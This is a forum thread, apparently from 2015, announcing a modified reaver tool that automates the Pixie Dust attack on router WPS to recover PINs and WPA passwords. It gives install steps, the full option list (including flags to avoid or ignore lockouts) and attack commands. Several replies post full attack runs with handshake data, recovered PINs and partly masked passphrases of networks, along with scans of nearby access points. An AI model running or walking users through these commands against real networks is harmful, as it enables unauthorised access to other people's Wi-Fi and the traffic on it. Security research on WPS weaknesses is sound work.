
Thread: Reaver modification for Pixie Dust Attack

  1. #1
    Join Date
    2015-Apr
    Posts
    39

    Reaver modification for Pixie Dust Attack

    Hello

    The community has made modifications to reaver so that it performs the pixie dust attack and automates the process of recovering the pin.

    Other attacks were implemented (Pin Generator) and some improvements have been made.

    Development is constant and anyone is welcome to help.



    Here is our contribution

    GitHub
    https://github.com/t6x/reaver-wps-fork-t6x



    Overview

    reaver-wps-fork-t6x is a modification done from a fork of reaver (https://code.google.com/p/reaver-wps-fork/)

    This modified version uses the Pixie Dust attack to find the correct WPS pin number.

    The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)



    Install Required Libraries and Tools

    Libraries for reaver

    Code:
    sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
    Tools

    Code:
    You must have installed the pixiewps created by Wiire (https://github.com/wiire/pixiewps)


    Compile and Install

    Code:
    Build Reaver
    
          cd reaver-wps-fork-t6x-master
          cd src
          ./configure
          make
    
    Install Reaver
    
          sudo make install


    Usage - Reaver

    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<wlan>          Name of the monitor-mode interface to use
            -b, --bssid=<mac>               BSSID of the target AP
    
    Optional Arguments:
            -m, --mac=<mac>                 MAC of the host system
            -e, --essid=<ssid>              ESSID of the target AP
            -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
            -o, --out-file=<file>           Send output to a log file [stdout]
            -s, --session=<file>            Restore a previous session file
            -C, --exec=<command>            Execute the supplied command upon successful pin recovery
            -D, --daemonize                 Daemonize reaver
            -a, --auto                      Auto detect the best advanced options for the target AP
            -f, --fixed                     Disable channel hopping
            -5, --5ghz                      Use 5GHz 802.11 channels
            -v, --verbose                   Display non-critical warnings (-vv for more)
            -q, --quiet                     Only display critical messages
            -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
            -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
            -h, --help                      Show help
    
    Advanced Options:
            -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
            -d, --delay=<seconds>           Set the delay between pin attempts [1]
            -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
            -g, --max-attempts=<num>        Quit after num pin attempts
            -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
            -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
            -t, --timeout=<seconds>         Set the receive timeout period [5]
            -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
            -A, --no-associate              Do not associate with the AP (association must be done by another application)
            -N, --no-nacks                  Do not send NACK messages when out of order packets are received
            -S, --dh-small                  Use small DH keys to improve crack speed
            -L, --ignore-locks              Ignore locked state reported by the target AP
            -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
            -n, --nack                      Target AP always sends a NACK [Auto]
            -w, --win7                      Mimic a Windows 7 registrar [False]
            -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
            -1, --p1-index                  Set initial array index for the first half of the pin [False]
            -2, --p2-index                  Set initial array index for the second half of the pin [False]
            -P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
            -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
    
    Example:
            reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

    Option (K)

    Code:
    The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
        
    *Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)

    Option (P)

    Code:
    Option (-P) in reaver puts reaver into a loop mode that does not run the WPS protocol to or past the M4 message, to hopefully avoid lockouts. This is ONLY to be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with the intent of:
    
    - Collecting repetitive hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers etc.
    
    - Time-sensitive attacks where the hash collecting continues repetitively until your time frame is met.
    
    - Scripting purposes for those who want a lockout-preventable way of PixieHash gathering for their use case.

    Usage - wash

    Code:
    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<iface>              Interface to capture packets on
            -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
    
    Optional Arguments:
            -c, --channel=<num>                  Channel to listen on [auto]
            -o, --out-file=<file>                Write data to file
            -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
            -D, --daemonize                      Daemonize wash
            -C, --ignore-fcs                     Ignore frame checksum errors
            -5, --5ghz                           Use 5GHz 802.11 channels
            -s, --scan                           Use scan mode
            -u, --survey                         Use survey mode [default]
            -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
            -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
            -h, --help                           Show help
    
    Example:
            wash -i mon0


    Example

    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching mon0 to channel 1
    [?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
    [+] Waiting for beacon from A.:9.:D.:....:....:...
    [+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c6:66:a6:72:37:6d:......
    [P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] WPS Model Serial Number: A978FD123BC
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
    [P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
    [+] Sending M2 message
    [P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
    [P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: dd:09:bd:24:......
    [Pixie-Dust][*] PSK2: 77:e0:dd:00:......
    [Pixie-Dust]   [+] WPS pin: 9178....
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: A.:9.:D.:3.:..:..
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '9178....'
    [Reaver Test] [+] WPA PSK: '112233'
    [Reaver Test] [+] AP SSID: '....'

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U


    For any problem or suggestion, contact someone who is helping with the project.
    Last edited by t6_x; 2015-05-05 at 16:22.

  2. #2
    Join Date
    2015-Mar
    Posts
    4
    I like the way you think. It makes everything easier in the long run. Good job!

    But get your sources right:

    Perfect example:
    https://forums.kali.org/showthread.p...-WPS-Attack%29

  3. #3
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    hi
    thank you very much for your great contribution!!!!!!
    TNX

  4. #4
    Join Date
    2015-Mar
    Posts
    127
    Awesome Sauce !! Nice job indeed.

    When run from root I get the error below. Yes, I did sudo make install after compiling.
    Code:
    root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
    [+] Sending M2 message
    [P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
    [P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
    [Pixie-Dust]   [*] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    sh: 1: ./reaver: not found
    When run from the src directory it works........
    Code:
    root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
    [+] Sending M2 message
    [P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
    [P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
    [Pixie-Dust]   [*] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '8127****'
    [Reaver Test] [+] WPA PSK: 'TG1672GD8****'
    [Reaver Test] [+] AP SSID: 'TG1672GE2'
    Probably my fault, just post my result, great job

  5. #5
    Join Date
    2015-Apr
    Posts
    39
    Probably my fault, just post my result, great job
    Oops, I forgot to commit to GitHub lol, it's my fault, sorry.

    Commit done.

    Sorry for that.

    I added a new option (-Z); with the -Z option it does not try to catch the password automatically, it stops executing when it finishes running pixiewps.

    I will add another option to output data to a file; when it's ready I'll push the commits.

    I will improve the initial post a bit.

    Sorry again.

  6. #6
    Join Date
    2015-Mar
    Posts
    127
    You fixed it.

    -Z works correctly also

  7. #7
    Job well done =).

  8. #8
    Join Date
    2015-Apr
    Posts
    39
    Thank you very much, g0tmi1k



    New version available

    -P Option of the wash created by t6x(displays the output of the wash with pipes)

    Code:
    root@kali:~/# wash -i mon0 -P
    XX:XX:XX:XX:XX:XX| 1|-64|1.0|No |Wifi1
    XX:XX:XX:XX:XX:XX| 2|-53|1.0|No |Wifi2

    -P Option of reaver created by DataHead (M3 Loop)

    Code:
    Reaver remains in the loop M3 stage
    Last edited by t6_x; 2015-04-16 at 04:48.

  9. #9
    Join Date
    2015-Mar
    Posts
    127


    Nice work....
    The -P option works great, it takes less screen space if multiple terminals are running.
    Code:
    wash -i wlan1mon -P
    00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
    00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
    00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
    00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
    00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
    00:00:00:00:23:97| 1|-63|1.0|No |TH0000
    00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
    00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
    00:00:00:00:37:56| 6|-47|1.0|No |133 00000
    00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
    00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
    00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
    00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
    00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
    00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
    00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
    00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
    00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
    00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
    00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
    00:00:00:00:03:D9|11|-55|1.0|No |NET000000
    00:00:00:00:E8:86|11|-54|1.0|No |9060000000
    00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
    00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
    00:00:00:00:45:00|11|-60|1.0|No |Pan000000
    Maybe make a change on your fork's GitHub page:
    Build Reaver

    cd reaver-1.4 to cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Also thanks for the credit.... but you typo'd my name.


    Question/Idea
    If option -K1 fails, does it automatically try -K2 or -K3?
    If -K3 fails, does it check -K1 etc.?

    or

    must the user enter a new command line each time?
    Last edited by nuroo; 2015-04-30 at 14:42.

  10. #10
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Another idea... have all the extra stuff print only with verbosity mode selected

    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from B4:75:0E:XX:XX:XX
    [+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Number: F9K1105 v2
    [+] Received M1 message
    [P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a:3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:11:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92:b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62:62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26:47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35:96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c:c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62:a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f1:a7:80:01:31:e2:14:02:4e
    [P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40:5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
    [+] Sending M2 message
    [P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7:00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
    [P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63:4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
    Segmentation fault
    Last edited by soxrok2212; 2015-04-14 at 22:50.

  11. #11
    Join Date
    2015-Mar
    Posts
    127
    No segmentation fault for me, however:

    If no pin is found, OK, then it exits.
    Code:
    root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] p1_index set to 1
    [+] p2_index set to 0
    [+] Restored previous session
    [+] Waiting for beacon from C4:..............
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Associated with C4:.............. (ESSID: TP-*********)
    [+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
    [P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f:c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd:f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d:06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:fb:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10:9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4:a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:df:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef:0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13:ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:72:0a:66:65:29:90:bf:59:94
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6:b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:96:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b:01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa:1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62:3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05:65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d:ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17:30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:70:49:c6:ba:3d:0c:50:56:42
    [P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b:e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
    [+] Sending M2 message
    [P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be:87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
    [P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3:ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]
    But if a pin is found, it hangs.
    Code:
    root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Waiting for beacon from 8C:..........
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Switching wlan3mon to channel 7
    [+] Switching wlan3mon to channel 9
    [+] Associated with 8C:.......... (ESSID: TG167*****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
    [P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46:af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34:60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7:e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:93:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5:76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc:a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:03:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d:b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10:9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3e:45:e8:60:c4:ef:2e:87:79
